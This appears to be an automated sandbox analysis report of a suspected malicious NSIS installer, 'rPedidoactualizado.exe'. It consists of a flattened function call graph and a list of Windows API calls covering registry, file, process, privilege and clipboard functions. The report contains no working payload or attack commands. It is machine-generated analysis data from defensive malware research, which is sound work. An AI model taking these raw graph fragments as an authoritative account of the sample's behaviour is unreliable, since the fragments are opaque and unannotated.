3731->3730 4080 405273 4081 405283 4080->4081 4082 405297 4080->4082 4083 405289 4081->4083 4092 4052e0 4081->4092 4084 40529f IsWindowVisible 4082->4084 4088 4052b6 4082->4088 4086 40425a SendMessageW 4083->4086 4087 4052ac 4084->4087 4084->4092 4085 4052e5 CallWindowProcW 4089 405293 4085->4089 4086->4089 4093 404bc9 SendMessageW 4087->4093 4088->4085 4098 404c49 4088->4098 4092->4085 4094 404c28 SendMessageW 4093->4094 4095 404bec GetMessagePos ScreenToClient SendMessageW 4093->4095 4097 404c20 4094->4097 4096 404c25 4095->4096 4095->4097 4096->4094 4097->4088 4107 406297 lstrcpynW 4098->4107 4100 404c5c 4108 4061de wsprintfW 4100->4108 4102 404c66 4103 40140b 2 API calls 4102->4103 4104 404c6f 4103->4104 4109 406297 lstrcpynW 4104->4109 4106 404c76 4106->4092 4107->4100 4108->4102 4109->4106 4110 402df3 4111 402e05 SetTimer 4110->4111 4113 402e1e 4110->4113 4111->4113 4112 402e73 4113->4112 4114 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4113->4114 4114->4112 4115 401cf3 4116 402c1f 17 API calls 4115->4116 4117 401cf9 IsWindow 4116->4117 4118 401a20 4117->4118 4119 4014f5 SetForegroundWindow 4120 402ac5 4119->4120 4121 402576 4122 402c41 17 API calls 4121->4122 4123 40257d 4122->4123 4126 405d8d GetFileAttributesW CreateFileW 4123->4126 4125 402589 4126->4125 4127 401b77 4128 401b84 4127->4128 4129 401bc8 4127->4129 4132 4022e4 4128->4132 4137 401b9b 4128->4137 4130 401bf2 GlobalAlloc 4129->4130 4131 401bcd 4129->4131 4133 4062b9 17 API calls 4130->4133 4142 401c0d 4131->4142 4148 406297 lstrcpynW 4131->4148 4134 4062b9 17 API calls 4132->4134 4133->4142 4136 4022f1 4134->4136 4140 4058fd MessageBoxIndirectW 4136->4140 4146 406297 lstrcpynW 4137->4146 4138 401bdf GlobalFree 4138->4142 4140->4142 4141 401baa 4147 406297 lstrcpynW 4141->4147 4144 401bb9 4149 406297 lstrcpynW 4144->4149 4146->4141 4147->4144 4148->4138 4149->4142 3826 4024f8 3827 402c81 17 API calls 3826->3827 3828 402502 3827->3828 3829 402c1f 17 API calls 3828->3829 3830 40250b 3829->3830 3831 402533 RegEnumValueW 3830->3831 3832 402527 RegEnumKeyW 3830->3832 3835 40288b 3830->3835 3833 40254f RegCloseKey 3831->3833 3834 402548 3831->3834 3832->3833 3833->3835 3834->3833 4150 401ffa 4151 402005 4150->4151 4152 402018 4151->4152 4154 402026 4151->4154 4174 4061de wsprintfW 4151->4174 4152->4154 4175 4061de wsprintfW 4152->4175 4156 4020f6 4154->4156 4157 402c41 17 API calls 4154->4157 4158 401423 24 API calls 4156->4158 4159 40204b 4157->4159 4165 402250 4158->4165 4160 402c41 17 API calls 4159->4160 4161 402054 4160->4161 4162 40206a LoadLibraryExW 4161->4162 4163 40205c GetModuleHandleW 4161->4163 4162->4156 4164 40207b 4162->4164 4163->4162 4163->4164 4166 4066e0 2 API calls 4164->4166 4167 402086 4166->4167 4168 4020c5 4167->4168 4169 40208c 4167->4169 4170 40209c 4168->4170 4171 4052ff 24 API calls 4168->4171 4169->4170 4172 401423 24 API calls 4169->4172 4170->4165 4173 4020e8 FreeLibrary 4170->4173 4171->4170 4172->4170 4173->4165 4174->4152 4175->4154 4176 40167b 4177 402c41 17 API calls 4176->4177 4178 401682 4177->4178 4179 402c41 17 API calls 4178->4179 4180 40168b 4179->4180 4181 402c41 17 API calls 4180->4181 4182 401694 MoveFileW 4181->4182 4183 4016a0 4182->4183 4184 4016a7 4182->4184 4186 401423 24 API calls 4183->4186 4185 4065da 2 API calls 4184->4185 4188 402250 4184->4188 4187 4016b6 4185->4187 4186->4188 4187->4188 4189 40605d 36 API calls 4187->4189 4189->4183 4190 404c7b GetDlgItem GetDlgItem 4191 404ccd 7 API calls 4190->4191 4197 404ee6 4190->4197 4192 404d70 DeleteObject 4191->4192 4193 404d63 SendMessageW 4191->4193 4194 404d79 4192->4194 4193->4192 4195 404db0 4194->4195 4196 4062b9 17 API calls 4194->4196 4198 40420e 18 API calls 4195->4198 4200 404d92 SendMessageW SendMessageW 4196->4200 4203 404fca 4197->4203 4208 404bc9 5 API calls 4197->4208 4224 404f57 4197->4224 4202 404dc4 4198->4202 4199 405076 4201 405080 SendMessageW 4199->4201 4207 405088 4199->4207 4200->4194 4201->4207 4209 40420e 18 API calls 4202->4209 4203->4199 4204 404ed9 4203->4204 4210 405023 SendMessageW 4203->4210 4205 404275 8 API calls 4204->4205 4211 40526c 4205->4211 4206 404fbc SendMessageW 4206->4203 4212 4050a1 4207->4212 4213 40509a ImageList_Destroy 4207->4213 4220 4050b1 4207->4220 4208->4224 4225 404dd2 4209->4225 4210->4204 4215 405038 SendMessageW 4210->4215 4216 4050aa GlobalFree 4212->4216 4212->4220 4213->4212 4214 405220 4214->4204 4221 405232 ShowWindow GetDlgItem ShowWindow 4214->4221 4218 40504b 4215->4218 4216->4220 4217 404ea7 GetWindowLongW SetWindowLongW 4219 404ec0 4217->4219 4226 40505c SendMessageW 4218->4226 4222 404ec6 ShowWindow 4219->4222 4223 404ede 4219->4223 4220->4214 4233 404c49 4 API calls 4220->4233 4237 4050ec 4220->4237 4221->4204 4241 404243 SendMessageW 4222->4241 4242 404243 SendMessageW 4223->4242 4224->4203 4224->4206 4225->4217 4227 404ea1 4225->4227 4230 404e22 SendMessageW 4225->4230 4231 404e5e SendMessageW 4225->4231 4232 404e6f SendMessageW 4225->4232 4226->4199 4227->4217 4227->4219 4230->4225 4231->4225 4232->4225 4233->4237 4234 4051f6 InvalidateRect 4234->4214 4235 40520c 4234->4235 4243 404b84 4235->4243 4236 40511a SendMessageW 4240 405130 4236->4240 4237->4236 4237->4240 4239 4051a4 SendMessageW SendMessageW 4239->4240 4240->4234 4240->4239 4241->4204 4242->4197 4246 404abb 4243->4246 4245 404b99 4245->4214 4247 404ad4 4246->4247 4248 4062b9 17 API calls 4247->4248 4249 404b38 4248->4249 4250 4062b9 17 API calls 4249->4250 4251 404b43 4250->4251 4252 4062b9 17 API calls 4251->4252 4253 404b59 lstrlenW wsprintfW SetDlgItemTextW 4252->4253 4253->4245 4254 401e7d 4255 402c41 17 API calls 4254->4255 4256 401e83 4255->4256 4257 402c41 17 API calls 4256->4257 4258 401e8c 4257->4258 4259 402c41 17 API calls 4258->4259 4260 401e95 4259->4260 4261 402c41 17 API calls 4260->4261 4262 401e9e 4261->4262 4263 401423 24 API calls 4262->4263 4264 401ea5 4263->4264 4271 4058c3 ShellExecuteExW 4264->4271 4266 401ee7 4267 406722 5 API calls 4266->4267 4269 40288b 4266->4269 4268 401f01 CloseHandle 4267->4268 4268->4269 4271->4266 4272 40437e lstrlenW 4273 40439d 4272->4273 4274 40439f WideCharToMultiByte 4272->4274 4273->4274 4275 4019ff 4276 402c41 17 API calls 4275->4276 4277 401a06 4276->4277 4278 402c41 17 API calls 4277->4278 4279 401a0f 4278->4279 4280 401a16 lstrcmpiW 4279->4280 4281 401a28 lstrcmpW 4279->4281 4282 401a1c 4280->4282 4281->4282 4283 4046ff 4284 40472b 4283->4284 4285 40473c 4283->4285 4344 4058e1 GetDlgItemTextW 4284->4344 4287 404748 GetDlgItem 4285->4287 4288 4047a7 4285->4288 4291 40475c 4287->4291 4289 40488b 4288->4289 4296 4062b9 17 API calls 4288->4296 4342 404a3a 4288->4342 4289->4342 4346 4058e1 GetDlgItemTextW 4289->4346 4290 404736 4292 40652b 5 API calls 4290->4292 4294 404770 SetWindowTextW 4291->4294 4295 405c17 4 API calls 4291->4295 4292->4285 4298 40420e 18 API calls 4294->4298 4300 404766 4295->4300 4301 40481b SHBrowseForFolderW 4296->4301 4297 4048bb 4302 405c74 18 API calls 4297->4302 4303 40478c 4298->4303 4299 404275 8 API calls 4304 404a4e 4299->4304 4300->4294 4307 405b6c 3 API calls 4300->4307 4301->4289 4305 404833 CoTaskMemFree 4301->4305 4309 4048c1 4302->4309 4306 40420e 18 API calls 4303->4306 4308 405b6c 3 API calls 4305->4308 4310 40479a 4306->4310 4307->4294 4311 404840 4308->4311 4347 406297 lstrcpynW 4309->4347 4345 404243 SendMessageW 4310->4345 4314 404877 SetDlgItemTextW 4311->4314 4319 4062b9 17 API calls 4311->4319 4314->4289 4315 4047a0 4317 406671 5 API calls 4315->4317 4316 4048d8 4318 406671 5 API calls 4316->4318 4317->4288 4325 4048df 4318->4325 4320 40485f lstrcmpiW 4319->4320 4320->4314 4323 404870 lstrcatW 4320->4323 4321 404920 4348 406297 lstrcpynW 4321->4348 4323->4314 4324 404927 4326 405c17 4 API calls 4324->4326 4325->4321 4329 405bb8 2 API calls 4325->4329 4331 404978 4325->4331 4327 40492d GetDiskFreeSpaceW 4326->4327 4330 404951 MulDiv 4327->4330 4327->4331 4329->4325 4330->4331 4332 4049e9 4331->4332 4334 404b84 20 API calls 4331->4334 4333 404a0c 4332->4333 4335 40140b 2 API calls 4332->4335 4349 404230 KiUserCallbackDispatcher 4333->4349 4336 4049d6 4334->4336 4335->4333 4338 4049eb SetDlgItemTextW 4336->4338 4339 4049db 4336->4339 4338->4332 4341 404abb 20 API calls 4339->4341 4340 404a28 4340->4342 4343 404658 SendMessageW 4340->4343 4341->4332 4342->4299 4343->4342 4344->4290 4345->4315 4346->4297 4347->4316 4348->4324 4349->4340 4350 401000 4351 401037 BeginPaint GetClientRect 4350->4351 4352 40100c DefWindowProcW 4350->4352 4354 4010f3 4351->4354 4355 401179 4352->4355 4356 401073 CreateBrushIndirect FillRect DeleteObject 4354->4356 4357 4010fc 4354->4357 4356->4354 4358 401102 CreateFontIndirectW 4357->4358 4359 401167 EndPaint 4357->4359 4358->4359 4360 401112 6 API calls 4358->4360 4359->4355 4360->4359 4361 401503 4362 40150b 4361->4362 4364 40151e 4361->4364 4363 402c1f 17 API calls 4362->4363 4363->4364 3312 402484 3323 402c81 3312->3323 3315 402c41 17 API calls 3316 402497 3315->3316 3317 4024a2 RegQueryValueExW 3316->3317 3318 40288b 3316->3318 3319 4024c2 3317->3319 3320 4024c8 RegCloseKey 3317->3320 3319->3320 3328 4061de wsprintfW 3319->3328 3320->3318 3324 402c41 17 API calls 3323->3324 3325 402c98 3324->3325 3326 406104 RegOpenKeyExW 3325->3326 3327 40248e 3326->3327 3327->3315 3328->3320 4365 402104 4366 402c41 17 API calls 4365->4366 4367 40210b 4366->4367 4368 402c41 17 API calls 4367->4368 4369 402115 4368->4369 4370 402c41 17 API calls 4369->4370 4371 40211f 4370->4371 4372 402c41 17 API calls 4371->4372 4373 402129 4372->4373 4374 402c41 17 API calls 4373->4374 4376 402133 4374->4376 4375 402172 CoCreateInstance 4378 402191 4375->4378 4376->4375 4377 402c41 17 API calls 4376->4377 4377->4375 4379 401423 24 API calls 4378->4379 4380 402250 4378->4380 4379->4380 3329 401f06 3330 402c41 17 API calls 3329->3330 3331 401f0c 3330->3331 3332 4052ff 24 API calls 3331->3332 3333 401f16 3332->3333 3344 405880 CreateProcessW 3333->3344 3338 401f31 3340 401f41 3338->3340 3341 401f36 3338->3341 3339 40288b 3343 401f3f CloseHandle 3340->3343 3352 4061de wsprintfW 3341->3352 3343->3339 3345 4058b3 CloseHandle 3344->3345 3346 401f1c 3344->3346 3345->3346 3346->3339 3346->3343 3347 406722 WaitForSingleObject 3346->3347 3348 40673c 3347->3348 3349 40674e GetExitCodeProcess 3348->3349 3353 4066ad 3348->3353 3349->3338 3352->3343 3354 4066ca PeekMessageW 3353->3354 3355 4066c0 DispatchMessageW 3354->3355 3356 4066da WaitForSingleObject 3354->3356 3355->3354 3356->3348 3624 40230c 3625 402314 3624->3625 3626 40231a 3624->3626 3628 402c41 17 API calls 3625->3628 3627 402328 3626->3627 3629 402c41 17 API calls 3626->3629 3630 402336 3627->3630 3631 402c41 17 API calls 3627->3631 3628->3626 3629->3627 3632 402c41 17 API calls 3630->3632 3631->3630 3633 40233f WritePrivateProfileStringW 3632->3633 4381 40190c 4382 401943 4381->4382 4383 402c41 17 API calls 4382->4383 4384 401948 4383->4384 4385 4059a9 67 API calls 4384->4385 4386 401951 4385->4386 3634 40238e 3635 4023c1 3634->3635 3636 402396 3634->3636 3638 402c41 17 API calls 3635->3638 3637 402c81 17 API calls 3636->3637 3639 40239d 3637->3639 3640 4023c8 3638->3640 3641 4023a7 3639->3641 3644 4023d5 3639->3644 3646 402cff 3640->3646 3643 402c41 17 API calls 3641->3643 3645 4023ae RegDeleteValueW RegCloseKey 3643->3645 3645->3644 3647 402d0c 3646->3647 3648 402d13 3646->3648 3647->3644 3648->3647 3650 402d44 3648->3650 3651 406104 RegOpenKeyExW 3650->3651 3652 402d72 3651->3652 3653 402dec 3652->3653 3655 402d76 3652->3655 3653->3647 3654 402d98 RegEnumKeyW 3654->3655 3656 402daf RegCloseKey 3654->3656 3655->3654 3655->3656 3658 402dd0 RegCloseKey 3655->3658 3660 402d44 6 API calls 3655->3660 3657 406671 5 API calls 3656->3657 3659 402dbf 3657->3659 3658->3653 3661 402de0 RegDeleteKeyW 3659->3661 3662 402dc3 3659->3662 3660->3655 3661->3653 3662->3653 4387 40190f 4388 402c41 17 API calls 4387->4388 4389 401916 4388->4389 4390 4058fd MessageBoxIndirectW 4389->4390 4391 40191f 4390->4391 4392 401491 4393 4052ff 24 API calls 4392->4393 4394 401498 4393->4394 4395 401d14 4396 402c1f 17 API calls 4395->4396 4397 401d1b 4396->4397 4398 402c1f 17 API calls 4397->4398 4399 401d27 GetDlgItem 4398->4399 4400 402592 4399->4400 4401 402598 4402 4025c7 4401->4402 4403 4025ac 4401->4403 4405 4025fb 4402->4405 4406 4025cc 4402->4406 4404 402c1f 17 API calls 4403->4404 4413 4025b3 4404->4413 4408 402c41 17 API calls 4405->4408 4407 402c41 17 API calls 4406->4407 4409 4025d3 WideCharToMultiByte lstrlenA 4407->4409 4410 402602 lstrlenW 4408->4410 4409->4413 4410->4413 4411 40262f 4412 402645 4411->4412 4414 405e3f WriteFile 4411->4414 4413->4411 4413->4412 4415 405e6e 5 API calls 4413->4415 4414->4412 4415->4411 4416 40149e 4417 4022f7 4416->4417 4418 4014ac PostQuitMessage 4416->4418 4418->4417 4419 401c1f 4420 402c1f 17 API calls 4419->4420 4421 401c26 4420->4421 4422 402c1f 17 API calls 4421->4422 4423 401c33 4422->4423 4424 402c41 17 API calls 4423->4424 4426 401c48 4423->4426 4424->4426 4425 401c58 4428 401c63 4425->4428 4429 401caf 4425->4429 4426->4425 4427 402c41 17 API calls 4426->4427 4427->4425 4430 402c1f 17 API calls 4428->4430 4431 402c41 17 API calls 4429->4431 4433 401c68 4430->4433 4432 401cb4 4431->4432 4434 402c41 17 API calls 4432->4434 4435 402c1f 17 API calls 4433->4435 4436 401cbd FindWindowExW 4434->4436 4437 401c74 4435->4437 4440 401cdf 4436->4440 4438 401c81 SendMessageTimeoutW 4437->4438 4439 401c9f SendMessageW 4437->4439 4438->4440 4439->4440 4441 402aa0 SendMessageW 4442 402ac5 4441->4442 4443 402aba InvalidateRect 4441->4443 4443->4442 4444 402821 4445 402827 4444->4445 4446 402ac5 4445->4446 4447 40282f FindClose 4445->4447 4447->4446 3256 4015a3 3257 402c41 17 API calls 3256->3257 3258 4015aa SetFileAttributesW 3257->3258 3259 4015bc 3258->3259 4448 4029a8 4449 402c1f 17 API calls 4448->4449 4450 4029ae 4449->4450 4451 4029d5 4450->4451 4452 4029ee 4450->4452 4459 40288b 4450->4459 4453 4029da 4451->4453 4454 4029eb 4451->4454 4455 402a08 4452->4455 4456 4029f8 4452->4456 4462 406297 lstrcpynW 4453->4462 4454->4459 4463 4061de wsprintfW 4454->4463 4458 4062b9 17 API calls 4455->4458 4457 402c1f 17 API calls 4456->4457 4457->4454 4458->4454 4462->4459 4463->4459 4464 4028ad 4465 402c41 17 API calls 4464->4465 4467 4028bb 4465->4467 4466 4028d1 4469 405d68 2 API calls 4466->4469 4467->4466 4468 402c41 17 API calls 4467->4468 4468->4466 4470 4028d7 4469->4470 4492 405d8d GetFileAttributesW CreateFileW 4470->4492 4472 4028e4 4473 4028f0 GlobalAlloc 4472->4473 4474 402987 4472->4474 4475 402909 4473->4475 4476 40297e CloseHandle 4473->4476 4477 4029a2 4474->4477 4478 40298f DeleteFileW 4474->4478 4493 403324 SetFilePointer 4475->4493 4476->4474 4478->4477 4480 40290f 4481 40330e ReadFile 4480->4481 4482 402918 GlobalAlloc 4481->4482 4483 402928 4482->4483 4484 40295c 4482->4484 4486 403116 31 API calls 4483->4486 4485 405e3f WriteFile 4484->4485 4487 402968 GlobalFree 4485->4487 4491 402935 4486->4491 4488 403116 31 API calls 4487->4488 4490 40297b 4488->4490 4489 402953 GlobalFree 4489->4484 4490->4476 4491->4489 4492->4472 4493->4480 4494 401a30 4495 402c41 17 API calls 4494->4495 4496 401a39 ExpandEnvironmentStringsW 4495->4496 4497 401a4d 4496->4497 4499 401a60 4496->4499 4498 401a52 lstrcmpW 4497->4498 4497->4499 4498->4499 3704 402032 3705 402044 3704->3705 3706 4020f6 3704->3706 3707 402c41 17 API calls 3705->3707 3708 401423 24 API calls 3706->3708 3709 40204b 3707->3709 3715 402250 3708->3715 3710 402c41 17 API calls 3709->3710 3711 402054 3710->3711 3712 40206a LoadLibraryExW 3711->3712 3713 40205c GetModuleHandleW 3711->3713 3712->3706 3714 40207b 3712->3714 3713->3712 3713->3714 3724 4066e0 WideCharToMultiByte 3714->3724 3718 4020c5 3720 40209c 3718->3720 3721 4052ff 24 API calls 3718->3721 3719 40208c 3719->3720 3722 401423 24 API calls 3719->3722 3720->3715 3723 4020e8 FreeLibrary 3720->3723 3721->3720 3722->3720 3723->3715 3725 40670a GetProcAddress 3724->3725 3726 402086 3724->3726 3725->3726 3726->3718 3726->3719 3732 403d35 3733 403e88 3732->3733 3734 403d4d 3732->3734 3736 403ed9 3733->3736 3737 403e99 GetDlgItem GetDlgItem 3733->3737 3734->3733 3735 403d59 3734->3735 3738 403d64 SetWindowPos 3735->3738 3739 403d77 3735->3739 3741 403f33 3736->3741 3746 401389 2 API calls 3736->3746 3740 40420e 18 API calls 3737->3740 3738->3739 3743 403d94 3739->3743 3744 403d7c ShowWindow 3739->3744 3745 403ec3 SetClassLongW 3740->3745 3742 40425a SendMessageW 3741->3742 3762 403e83 3741->3762 3771 403f45 3742->3771 3747 403db6 3743->3747 3748 403d9c DestroyWindow 3743->3748 3744->3743 3749 40140b 2 API calls 3745->3749 3750 403f0b 3746->3750 3751 403dbb SetWindowLongW 3747->3751 3752 403dcc 3747->3752 3802 404197 3748->3802 3749->3736 3750->3741 3753 403f0f SendMessageW 3750->3753 3751->3762 3756 403e75 3752->3756 3757 403dd8 GetDlgItem 3752->3757 3753->3762 3754 40140b 2 API calls 3754->3771 3755 404199 DestroyWindow EndDialog 3755->3802 3812 404275 3756->3812 3758 403e08 3757->3758 3759 403deb SendMessageW IsWindowEnabled 3757->3759 3764 403e15 3758->3764 3765 403e5c SendMessageW 3758->3765 3766 403e28 3758->3766 3776 403e0d 3758->3776 3759->3758 3759->3762 3761 4041c8 ShowWindow 3761->3762 3763 4062b9 17 API calls 3763->3771 3764->3765 3764->3776 3765->3756 3768 403e30 3766->3768 3769 403e45 3766->3769 3774 40140b 2 API calls 3768->3774 3772 40140b 2 API calls 3769->3772 3770 403e43 3770->3756 3771->3754 3771->3755 3771->3762 3771->3763 3773 40420e 18 API calls 3771->3773 3793 4040d9 DestroyWindow 3771->3793 3803 40420e 3771->3803 3775 403e4c 3772->3775 3773->3771 3774->3776 3775->3756 3775->3776 3809 4041e7 3776->3809 3778 403fc0 GetDlgItem 3779 403fd5 3778->3779 3780 403fdd ShowWindow KiUserCallbackDispatcher 3778->3780 3779->3780 3806 404230 KiUserCallbackDispatcher 3780->3806 3782 404007 EnableWindow 3787 40401b 3782->3787 3783 404020 GetSystemMenu EnableMenuItem SendMessageW 3784 404050 SendMessageW 3783->3784 3783->3787 3784->3787 3786 403d16 18 API calls 3786->3787 3787->3783 3787->3786 3807 404243 SendMessageW 3787->3807 3808 406297 lstrcpynW 3787->3808 3789 40407f lstrlenW 3790 4062b9 17 API calls 3789->3790 3791 404095 SetWindowTextW 3790->3791 3792 401389 2 API calls 3791->3792 3792->3771 3794 4040f3 CreateDialogParamW 3793->3794 3793->3802 3795 404126 3794->3795 3794->3802 3796 40420e 18 API calls 3795->3796 3797 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3796->3797 3798 401389 2 API calls 3797->3798 3799 404177 3798->3799 3799->3762 3800 40417f ShowWindow 3799->3800 3801 40425a SendMessageW 3800->3801 3801->3802 3802->3761 3802->3762 3804 4062b9 17 API calls 3803->3804 3805 404219 SetDlgItemTextW 3804->3805 3805->3778 3806->3782 3807->3787 3808->3789 3810 4041f4 SendMessageW 3809->3810 3811 4041ee 3809->3811 3810->3770 3811->3810 3813 404338 3812->3813 3814 40428d GetWindowLongW 3812->3814 3813->3762 3814->3813 3815 4042a2 3814->3815 3815->3813 3816 4042d2 3815->3816 3817 4042cf GetSysColor 3815->3817 3818 4042e2 SetBkMode 3816->3818 3819 4042d8 SetTextColor 3816->3819 3817->3816 3820 404300 3818->3820 3821 4042fa GetSysColor 3818->3821 3819->3818 3822 404307 SetBkColor 3820->3822 3823 404311 3820->3823 3821->3820 3822->3823 3823->3813 3824 404324 DeleteObject 3823->3824 3825 40432b CreateBrushIndirect 3823->3825 3824->3825 3825->3813 4505 401735 4506 402c41 17 API calls 4505->4506 4507 40173c SearchPathW 4506->4507 4508 401757 4507->4508 4509 402a35 4510 402c1f 17 API calls 4509->4510 4511 402a3b 4510->4511 4512 402a72 4511->4512 4513 40288b 4511->4513 4515 402a4d 4511->4515 4512->4513 4514 4062b9 17 API calls 4512->4514 4514->4513 4515->4513 4517 4061de wsprintfW 4515->4517 4517->4513 4518 4014b8 4519 4014be 4518->4519 4520 401389 2 API calls 4519->4520 4521 4014c6 4520->4521 4522 4046b8 4523 4046c8 4522->4523 4524 4046ee 4522->4524 4525 40420e 18 API calls 4523->4525 4526 404275 8 API calls 4524->4526 4527 4046d5 SetDlgItemTextW 4525->4527 4528 4046fa 4526->4528 4527->4524 4529 401db9 GetDC 4530 402c1f 17 API calls 4529->4530 4531 401dcb GetDeviceCaps MulDiv ReleaseDC 4530->4531 4532 402c1f 17 API calls 4531->4532 4533 401dfc 4532->4533 4534 4062b9 17 API calls 4533->4534 4535 401e39 CreateFontIndirectW 4534->4535 4536 402592 4535->4536 4537 40283b 4538 402843 4537->4538 4539 402847 FindNextFileW 4538->4539 4541 402859 4538->4541 4540 4028a0 4539->4540 4539->4541 4543 406297 lstrcpynW 4540->4543 4543->4541 3858 40543e 3859 4055e8 3858->3859 3860 40545f GetDlgItem GetDlgItem GetDlgItem 3858->3860 3862 4055f1 GetDlgItem CreateThread CloseHandle 3859->3862 3863 405619 3859->3863 3903 404243 SendMessageW 3860->3903 3862->3863 3906 4053d2 5 API calls 3862->3906 3865 405644 3863->3865 3867 405630 ShowWindow ShowWindow 3863->3867 3868 405669 3863->3868 3864 4054cf 3873 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3864->3873 3866 4056a4 3865->3866 3870 405658 3865->3870 3871 40567e ShowWindow 3865->3871 3866->3868 3880 4056b2 SendMessageW 3866->3880 3905 404243 SendMessageW 3867->3905 3872 404275 8 API calls 3868->3872 3874 4041e7 SendMessageW 3870->3874 3876 405690 3871->3876 3877 40569e 3871->3877 3875 405677 3872->3875 3878 405544 3873->3878 3879 405528 SendMessageW SendMessageW 3873->3879 3874->3868 3884 4052ff 24 API calls 3876->3884 3885 4041e7 SendMessageW 3877->3885 3881 405557 3878->3881 3882 405549 SendMessageW 3878->3882 3879->3878 3880->3875 3883 4056cb CreatePopupMenu 3880->3883 3887 40420e 18 API calls 3881->3887 3882->3881 3886 4062b9 17 API calls 3883->3886 3884->3877 3885->3866 3888 4056db AppendMenuW 3886->3888 3889 405567 3887->3889 3890 4056f8 GetWindowRect 3888->3890 3891 40570b TrackPopupMenu 3888->3891 3892 405570 ShowWindow 3889->3892 3893 4055a4 GetDlgItem SendMessageW 3889->3893 3890->3891 3891->3875 3894 405726 3891->3894 3895 405593 3892->3895 3896 405586 ShowWindow 3892->3896 3893->3875 3897 4055cb SendMessageW SendMessageW 3893->3897 3898 405742 SendMessageW 3894->3898 3904 404243 SendMessageW 3895->3904 3896->3895 3897->3875 3898->3898 3899 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3898->3899 3901 405784 SendMessageW 3899->3901 3901->3901 3902 4057ad GlobalUnlock SetClipboardData CloseClipboard 3901->3902 3902->3875 3903->3864 3904->3893 3905->3865

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 30 403495-40349a 28->30 31 40349c-4034a0 28->31 38 403610-40362a DeleteFileW call 402edd 29->38 39 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->39 30->30 30->31 33 4034a2-4034a6 31->33 34 4034a7-4034ab 31->34 33->34 36 4034b1-4034b7 34->36 37 40356a-403577 call 405b99 34->37 43 4034d2-40350b 36->43 44 4034b9-4034c1 36->44 54 403579-40357a 37->54 55 40357b-403581 37->55 56 403630-403636 38->56 57 4036db-4036eb call 4038ad OleUninitialize 38->57 39->38 52 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 39->52 50 403528-403562 43->50 51 40350d-403512 43->51 48 4034c3-4034c6 44->48 49 4034c8 44->49 48->43 48->49 49->43 50->37 53 403564-403568 50->53 51->50 58 403514-40351c 51->58 52->38 52->57 53->37 60 403589-403597 call 406297 53->60 54->55 55->28 61 403587 55->61 62 4036cb-4036d2 call 403987 56->62 63 40363c-403647 call 405b99 56->63 73 403811-403817 57->73 74 4036f1-403701 call 4058fd ExitProcess 57->74 65 403523 58->65 66 40351e-403521 58->66 68 40359c 60->68 61->68 76 4036d7 62->76 80 403695-40369f 63->80 81 403649-40367e 63->81 65->50 66->50 66->65 68->29 78 403895-40389d 73->78 79 403819-40382f GetCurrentProcess OpenProcessToken 73->79 76->57 82 4038a3-4038a7 ExitProcess 78->82 83 40389f 78->83 87 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403865-403873 call 406671 79->88 85 4036a1-4036af call 405c74 80->85 86 403707-40371b call 405868 lstrcatW 80->86 89 403680-403684 81->89 83->82 85->57 99 4036b1-4036c7 call 406297 * 2 85->99 100 403728-403742 lstrcatW lstrcmpiW 86->100 101 40371d-403723 lstrcatW 86->101 87->88 102 403881-40388c ExitWindowsEx 88->102 103 403875-40387f 88->103 93 403686-40368b 89->93 94 40368d-403691 89->94 93->94 95 403693 93->95 94->89 94->95 95->80 99->62 100->57 105 403744-403747 100->105 101->100 102->78 106 40388e-403890 call 40140b 102->106 103->102 103->106 108 403750 call 40584b 105->108 109 403749-40374e call 4057ce 105->109 106->78 117 403755-403763 SetCurrentDirectoryW 108->117 109->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 128 403805-40380c call 40605d 126->128 127->126 129 4037ce-4037ee call 40605d call 4062b9 call 405880 127->129 128->57 129->126 138 4037f0-4037f7 CloseHandle 129->138 138->126
                                          APIs
                                          • SetErrorMode.KERNELBASE ref: 0040338F
                                          • GetVersion.KERNEL32 ref: 00403395
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                          • OleInitialize.OLE32(00000000), ref: 0040340C
                                          • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                          • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000020,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                            • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                            • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
